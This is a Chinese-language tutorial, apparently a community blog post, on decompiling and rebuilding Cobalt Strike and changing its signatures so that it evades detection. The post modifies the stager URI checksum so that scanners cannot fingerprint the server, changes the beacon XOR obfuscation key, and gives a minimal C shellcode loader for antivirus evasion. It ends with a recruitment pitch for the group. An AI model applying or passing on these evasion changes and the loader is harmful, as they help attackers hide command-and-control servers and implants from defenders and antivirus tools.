1、CobaltStrike反编译
首先我们将IEDA中的java-decompiler.jar拿出来,一般在/plugins/java-decompiler.jar/lib/里面。然后新建两个文件夹来存放我们反编译的文件。其中cs_bin里面存放未反编译的文件。
然后提取其中的consoledecompiler,路径一般如下:
org/jetbrains/java/decompiler/main/decompiler/
然后将斜杠改成点,得到:
org.jetbrains.java.decompiler.main.decompiler.consoledecompiler
使用方法如下:
java -cp java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler
会报错,提示缺少主类。我们需要跟上-dsg=true参数以及需要反编译的文件和反编译后的目录。(图配错了)
java -cp java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dsg=true cs_bin/cobaltstrike.jar cs_src
然后解压生成的文件,得到后缀为.java的文件。便可以直接导入到idea了。
打开idea新建项目,一路next
完成后新建一个xx_src与一个lib目录
然后复制刚刚解压的文件到新建的src目录中。未反编译的放入lib中
然后选择file里面的project Structure中的模块。
点击加号,选择lib目录下面的文件,点击apply.。确保是Compile
然后依次选择Artifacts—>jar—>from modules with dependencies 去新建一个Main Class
这个名字可以在lib—->cs.jar—->meta-inf—->menifest.mf中找到
然后找到反编译完的aggressor中,找到主类,右键选择refactor —-> copy
然后下选择文件夹,选择刚刚的src文件夹,并新建aggressor 文件夹。
效果如下:
添加一行代码,测试:
JOptionPane.showMessageDialog(null,"hello world!!!");
现在所需要的修改就完成了,后面需要修改什么文件,都可以以copy的方式去复制、修改了。然后build测试:Build—–>Build Artifacts—–>Build,out文件夹就可以看到了。
然后添加一个jar配置,然后把刚刚的jar添加到路径中
添加配置:
如果打包有问题,可以把下面的文件复制过去
2、CobaltStrike特征修改
1、修改stager防止被扫:修改位置如下:
cloudstrike/webserver.class
主要是isStager函数,只要不是92或者93就行。这里首先需要修改checksum8,将其返回值改为:
return sum
随机生成文件,然后调用算法,得到需要的值。
public class test {
public static long checksum8(String text) {
if (text.length() < 4) {
return 0L;
} else {
text = text.replace("/", "");
long sum = 0L;
for(int x = 0; x < text.length(); ++x) {
sum += (long)text.charAt(x);
}
return sum ;
}
}
public static void main(String []args) {
String key = "8626fe7dcd8d412a80d0b3f0e36afd4a.jpg";
long flag = checksum8(key);
System.out.println(flag);
}
}
然后将该值放入:
public static boolean isStager(String uri) {
return checksum8(uri) == 2747L;
}
并修改
common/CommonUtils中的
将返回值改成我们刚刚修改的文件名:
x64同理修改。或者使用之前的师傅们改好的东西,直接把
beacon/BeaconPayload.java
复制过来。然后修改
public static byte[] beacon_obfuscate(byte[] var0) {
byte[] var1 = new byte[var0.length];
for(int var2 = 0; var2 < var0.length; ++var2) {
var1[var2] = (byte)(var0[var2] ^ );
}
return var1;
}
的异或值,再将所有的dll更改后放入即可。
2、修改源码。简单免杀:
shellcode生成的路径为:
/aggressor/dialogs/PayloadGeneratorDialog.java
以C为例,若需修改,直接选择ToC,跳转就可,位置在:
encoders/Transforms.java
我们便可以直接拿过了我们的加载器来使用
unsigned char buf[] ="";
void main(){
((void(WINAPI*)(void))&buf)();
}
此时生成的.c文件如下:
参考文章:
https://github.com/qigpig/bypass-beacon-config-scan
https://mp.weixin.qq.com/s?__biz=MzU2NTc2MjAyNg==&mid=2247484689&idx=1&sn=8cf9c031f3d926c155ee5c018941b416&chksm=fcb78794cbc00e82e7a44f89e796be2ef551a792946992dd540d31891848dca84398de16b85e&mpshare=1&scene=23&srcid=1205W5UXcmMgANYQEPoqFrtI&sharer_sharetime=1607133873287&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd
星球营造良好的技术交流氛围,一直秉承着有问有答才是真正的技术交流,如果你喜欢分享,喜欢学习,那么请加入我们吧
老哥们纷纷放出大招,牛逼class
欢迎加入我们,学习技术,分享技术,解决难题